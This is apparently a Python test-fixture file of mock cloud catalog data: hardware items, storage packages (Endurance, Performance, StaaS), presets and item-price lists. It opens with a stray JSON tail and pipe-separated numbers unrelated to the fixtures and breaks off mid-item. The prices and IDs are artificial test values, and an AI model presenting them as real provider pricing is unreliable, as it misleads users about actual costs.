                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2099",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.164",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200269,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": "",
                "quantity": ""
            },
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2161.97",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.258",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200271,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": 503,
                "quantity": ""
            }
        ],
        "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
        "id": 10195,
        "itemCategory": {
            "categoryCode": "dedicated_virtual_hosts"
        }
    }]}
| 33.444606
| 106
| 0.375074
|
# Fixture: hardware catalog items (unknown placeholder, IPv6, uplink speed,
# OS, IP address, VPN, remote management, bandwidth) each with one price
# entry. Note the two BANDWIDTH_0_GB variants: the second (id 1800) has no
# 'recurringFee' key — presumably deliberate shape variation; confirm with
# the consuming tests.
HARDWARE_ITEMS = [
    {'attributes': [],
     'capacity': '999',
     'description': 'Unknown',
     'itemCategory': {'categoryCode': 'unknown', 'id': 325},
     'keyName': 'UNKNOWN',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 1245172,
                 "locationGroupId": '',
                 'itemId': 935954,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 0}]},
    {'attributes': [],
     'capacity': '64',
     'description': '1 IPv6 Address',
     'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
                      'id': 325},
     'keyName': '1_IPV6_ADDRESS',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 17129,
                 "locationGroupId": '',
                 'itemId': 4097,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 0}]},
    {'attributes': [],
     'capacity': '10',
     'description': '10 Mbps Public & Private Network Uplinks',
     'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
     'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 272,
                 "locationGroupId": '',
                 'itemId': 186,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 5}]},
    {'attributes': [],
     'capacity': '0',
     'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
     'itemCategory': {'categoryCode': 'os', 'id': 12},
     'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 37650,
                 "locationGroupId": '',
                 'itemId': 4702,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 9}],
     'softwareDescription': {'id': 1362,
                             'longDescription': 'Ubuntu / 14.04-64',
                             'referenceCode': 'UBUNTU_14_64'}},
    {'attributes': [],
     'capacity': '1',
     'description': '1 IP Address',
     'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
     'keyName': '1_IP_ADDRESS',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 21,
                 "locationGroupId": '',
                 'itemId': 15,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 0}]},
    {'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
                     'id': 1014}],
     'description': 'Unlimited SSL VPN Users',
     'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
     'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 420,
                 "locationGroupId": '',
                 'itemId': 309,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 0}]},
    {'attributes': [],
     'description': 'Reboot / KVM over IP',
     'itemCategory': {'categoryCode': 'remote_management',
                      'id': 46},
     'keyName': 'REBOOT_KVM_OVER_IP',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 906,
                 "locationGroupId": '',
                 'itemId': 504,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 0}]},
    {'attributes': [],
     'capacity': '0',
     'description': '0 GB Bandwidth',
     'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
     'keyName': 'BANDWIDTH_0_GB',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'id': 22505,
                 "locationGroupId": '',
                 'itemId': 4481,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 98}]},
    {'attributes': [],
     'capacity': '0',
     'description': '0 GB Bandwidth',
     'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
     'keyName': 'BANDWIDTH_0_GB_2',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 1800,
                 "locationGroupId": '',
                 'itemId': 439,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'setupFee': '0',
                 'sort': 99}]}]
# Fixture: "Endurance" enterprise storage package (id 240). Items cover the
# service itself, file/block storage, storage space with tier-restricted
# snapshot/replication price variants, and the 200/300 tier-level items.
# Prices carry capacityRestriction* keys keyed on STORAGE_TIER_LEVEL.
ENTERPRISE_PACKAGE = {
    'categories': [
        {'categoryCode': 'storage_service_enterprise'}
    ],
    'id': 240,
    'name': 'Endurance',
    'items': [
        {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'storage_service_enterprise'},
            'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_service_enterprise'}
                    ],
                    'id': 45058,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'storage_file'},
            'keyName': 'FILE_STORAGE_2',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_file'}
                    ],
                    'id': 45108,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'storage_block'},
            'keyName': 'BLOCK_STORAGE_2',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_block'}
                    ],
                    'id': 45098,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '10',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '10_GB_STORAGE_SPACE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 46160,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '300',
                    'capacityRestrictionMinimum': '300',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 46170,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '20',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 45860,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 46659,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 45128,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '300',
                    'capacityRestrictionMinimum': '300',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 46789,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '300',
                    'capacityRestrictionMinimum': '300',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 45318,
                    'locationGroupId': ''
                }
            ]
        }, {
            'attributes': [
                {'value': '300'}
            ],
            'capacity': '300',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': 'WRITEHEAVY_TIER',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'id': 45088,
                    'locationGroupId': ''
                }
            ]
        }, {
            'attributes': [
                {'value': '200'}
            ],
            'capacity': '200',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': 'READHEAVY_TIER',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'id': 45078,
                    'locationGroupId': ''
                }
            ]
        }
    ]
}
# Fixture: "Performance" storage package (id 222) — iSCSI/NFS service items,
# 20 GB / 1000 GB storage-space items, and IOPS items whose prices are
# restricted by STORAGE_SPACE capacity ranges.
PERFORMANCE_PACKAGE = {
    'categories': [
        {'categoryCode': 'performance_storage_iscsi'},
        {'categoryCode': 'performance_storage_nfs'}
    ],
    'id': 222,
    'name': 'Performance',
    'items': [
        {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
            'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_iscsi'}
                    ],
                    'id': 40672,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'performance_storage_nfs'},
            'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_nfs'}
                    ],
                    'id': 40662,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '20',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 40682,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 40742,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '800',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'keyName': '800_IOPS_4',
            'prices': [
                {
                    'capacityRestrictionMaximum': '1000',
                    'capacityRestrictionMinimum': '100',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 41562,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'keyName': '1000_IOPS',
            'prices': [
                {
                    'capacityRestrictionMaximum': '20',
                    'capacityRestrictionMinimum': '20',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 40882,
                    'locationGroupId': ''
                }
            ]
        }
    ]
}
# Fixture: Storage-as-a-Service package (id 759). Mixes capacity-range items
# (capacityMinimum/Maximum), IOPS-per-GB items, tier-level items, snapshot
# space, and replication — with price restrictions keyed on IOPS,
# STORAGE_SPACE, or STORAGE_TIER_LEVEL. Standard prices use
# locationGroupId '' (compare SAAS_REST_PACKAGE, which uses None).
SAAS_PACKAGE = {
    'categories': [
        {'categoryCode': 'storage_as_a_service'}
    ],
    'id': 759,
    'name': 'Storage As A Service (StaaS)',
    'items': [
        {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'id': 189433,
                    'categories': [
                        {'categoryCode': 'storage_as_a_service'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_block'}
                    ],
                    'id': 189443,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_file'}
                    ],
                    'id': 189453,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '999',
            'capacityMinimum': '500',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '500_999_GBS',
            'prices': [
                {
                    'id': 189993,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '1999',
            'capacityMinimum': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_1999_GBS',
            'prices': [
                {
                    'id': 190113,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '12000',
            'capacityMinimum': '1',
            'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
            'prices': [
                {
                    'id': 193433,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '12000',
            'capacityMinimum': '1',
            'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
            'prices': [
                {
                    'id': 194763,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '10000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '999',
                    'capacityRestrictionMinimum': '500',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190053,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '20000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '1999',
                    'capacityRestrictionMinimum': '1000',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190173,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '200',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': '',
            'prices': [
                {
                    'id': 193373,
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '300',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': '',
            'prices': [
                {
                    'id': 194703,
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '10',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '48000',
                    'capacityRestrictionMinimum': '100',
                    'capacityRestrictionType': 'IOPS',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 191193,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193613,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '300',
                    'capacityRestrictionMinimum': '300',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 194943,
                    'locationGroupId': ''}]
        }, {
            'capacity': '20',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193853,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {
                'categoryCode': 'performance_storage_replication'
            },
            'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '48000',
                    'capacityRestrictionMinimum': '1',
                    'capacityRestrictionType': 'IOPS',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 192033,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {
                'categoryCode': 'performance_storage_replication'
            },
            'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 194693,
                    'locationGroupId': ''
                }
            ]
        }
    ]
}
# Fixture: same StaaS package (id 759) as SAAS_PACKAGE but shaped like a
# REST-transport response — the only visible difference is that standard
# prices use locationGroupId None instead of ''.
SAAS_REST_PACKAGE = {
    'categories': [
        {'categoryCode': 'storage_as_a_service'}
    ],
    'id': 759,
    'name': 'Storage As A Service (StaaS)',
    'items': [
        {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'id': 189433,
                    'categories': [
                        {'categoryCode': 'storage_as_a_service'}
                    ],
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '20',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193853,
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '1999',
            'capacityMinimum': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_1999_GBS',
            'prices': [
                {
                    'id': 190113,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '20000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '1999',
                    'capacityRestrictionMinimum': '1000',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190173,
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_file'}
                    ],
                    'id': 189453,
                    'locationGroupId': None
                }
            ]
        }
    ]
}
# Fixture: an active hardware preset (single Xeon 1270, package 200) with
# one hourly/monthly price entry.
activePreset1 = dict(
    description='Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
    id=64,
    isActive='1',
    keyName='S1270_8GB_2X1TBSATA_NORAID',
    name='S1270 8GB 2X1TBSATA NORAID',
    packageId=200,
    prices=[
        dict(
            hourlyRecurringFee='1.18',
            id=165711,
            locationGroupId='',
            recurringFee='780',
        )
    ],
)
# Fixture: an active hardware preset (dual Xeon Gold, package 200) sharing
# the same price record as activePreset1's.
activePreset2 = dict(
    description='Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
    id=65,
    isActive='1',
    keyName='DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
    name='DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
    packageId=200,
    prices=[
        dict(
            hourlyRecurringFee='1.18',
            id=165711,
            locationGroupId='',
            recurringFee='780',
        )
    ],
)
# Fixture: getAllObjects()-style response — one Bare Metal Server package
# (id 200) assembled from HARDWARE_ITEMS plus the two preset fixtures, with
# itemPrices that mix location-group-specific (505/507) and standard ('')
# price records.
getAllObjects = [{
    'activePresets': [activePreset1],
    'accountRestrictedActivePresets': [activePreset2],
    'description': 'Bare Metal Server',
    'firstOrderStepId': 1,
    'id': 200,
    'isActive': 1,
    'items': HARDWARE_ITEMS,
    'name': 'Bare Metal Server',
    'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
                 'keyname': 'WASHINGTON_DC',
                 'location': {'location': {'id': 37473,
                                           'longName': 'Washington 1',
                                           'name': 'wdc01'}},
                 'sortOrder': 10}],
    'subDescription': 'Bare Metal Server',
    'unitSize': 1,
    "itemPrices": [
        {
            "hourlyRecurringFee": ".027",
            "id": 205911,
            "laborFee": "0",
            "locationGroupId": 505,
            "capacityRestrictionMaximum": "40",
            "capacityRestrictionMinimum": "40",
            "capacityRestrictionType": "CORE",
            "item": {
                "capacity": "0",
                "description": "Load Balancer Uptime",
                "id": 10785,
                "keyName": "LOAD_BALANCER_UPTIME",
            }
        },
        {
            "hourlyRecurringFee": "0",
            "id": 199467,
            "laborFee": "0",
            "locationGroupId": '',
            "recurringFee": "0",
            "item": {
                "capacity": "0",
                "description": "Load Balancer Bandwidth",
                "id": 10051,
                "keyName": "LOAD_BALANCER_BANDWIDTH",
            }
        },
        {
            "hourlyRecurringFee": ".028",
            "id": 205913,
            "laborFee": "0",
            "locationGroupId": 507,
            "item": {
                "capacity": "0",
                "description": "Load Balancer Uptime",
                "id": 10785,
                "keyName": "LOAD_BALANCER_UPTIME",
            }
        }]
}]
# Fixture: generic getItems()-style catalog covering port speed, RAM, guest
# cores (standard and dedicated), iSCSI, portable public/private IPs, global
# IPv4/IPv6, bandwidth and an OS item. Price shapes vary deliberately:
# numeric vs string fees, present/absent locationGroupId, and prices with or
# without category lists.
getItems = [
    {
        'id': 1234,
        'keyName': 'KeyName01',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'softwareDescription': {
            'id': 1228,
            'longDescription': 'Redhat EL 5.10-64',
            'referenceCode': 'REDHAT_5_64'
        },
        'prices': [{'id': 1122,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 2233,
        'keyName': 'KeyName02',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'prices': [{'id': 4477,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 1239,
        'keyName': 'KeyName03',
        'capacity': '2',
        'description': 'RAM',
        'itemCategory': {'categoryCode': 'RAM'},
        'prices': [{'id': 1133,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 3,
                                    'name': 'RAM',
                                    'categoryCode': 'ram'}]}],
    },
    {
        'id': 1240,
        'keyName': 'KeyName014',
        'capacity': '4',
        'units': 'PRIVATE_CORE',
        'description': 'Computing Instance (Dedicated)',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 1007,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        'id': 1250,
        'keyName': 'KeyName015',
        'capacity': '4',
        'units': 'CORE',
        'description': 'Computing Instance',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 1144,
                    'locationGroupId': None,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        'id': 112233,
        'keyName': 'KeyName016',
        'capacity': '55',
        'units': 'CORE',
        'description': 'Computing Instance',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 332211,
                    'locationGroupId': 1,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        'id': 4439,
        'keyName': 'KeyName017',
        'capacity': '1',
        'description': '1 GB iSCSI Storage',
        'itemCategory': {'categoryCode': 'iscsi'},
        'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 1121,
        'keyName': 'KeyName081',
        'capacity': '20',
        'description': '20 GB iSCSI snapshot',
        'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
        'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
    },
    {
        'id': 4440,
        'keyName': 'KeyName019',
        'capacity': '4',
        'description': '4 Portable Public IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
        'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 8880,
        'keyName': 'KeyName0199',
        'capacity': '8',
        'description': '8 Portable Public IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
        'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 44400,
        'keyName': 'KeyName0155',
        'capacity': '4',
        'description': '4 Portable Private IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
        'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 88800,
        'keyName': 'KeyName0144',
        'capacity': '8',
        'description': '8 Portable Private IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
        'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
    },
    {
        'id': 10,
        'keyName': 'KeyName0341',
        'capacity': '0',
        'description': 'Global IPv4',
        'itemCategory': {'categoryCode': 'global_ipv4'},
        'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
    },
    {
        'id': 66464,
        'keyName': '1_IPV6_ADDRESS',
        'capacity': '64',
        'description': '/64 Block Portable Public IPv6 Addresses',
        'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
        'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
    },
    {
        'id': 610,
        'keyName': 'KeyName031',
        'capacity': '0',
        'description': 'Global IPv6',
        'itemCategory': {'categoryCode': 'global_ipv6'},
        'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {'attributes': [],
     'capacity': '0',
     'description': '0 GB Bandwidth',
     'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
     'keyName': 'BANDWIDTH_0_GB_2',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 1800,
                 "locationGroupId": '',
                 'itemId': 439,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'setupFee': '0',
                 'sort': 99}]},
    {'attributes': [],
     'capacity': '10',
     'description': '10 Mbps Public & Private Network Uplinks',
     'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
     'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 272,
                 "locationGroupId": '',
                 'itemId': 186,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 5}]},
    {'attributes': [],
     'capacity': '0',
     'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
     'itemCategory': {'categoryCode': 'os', 'id': 12},
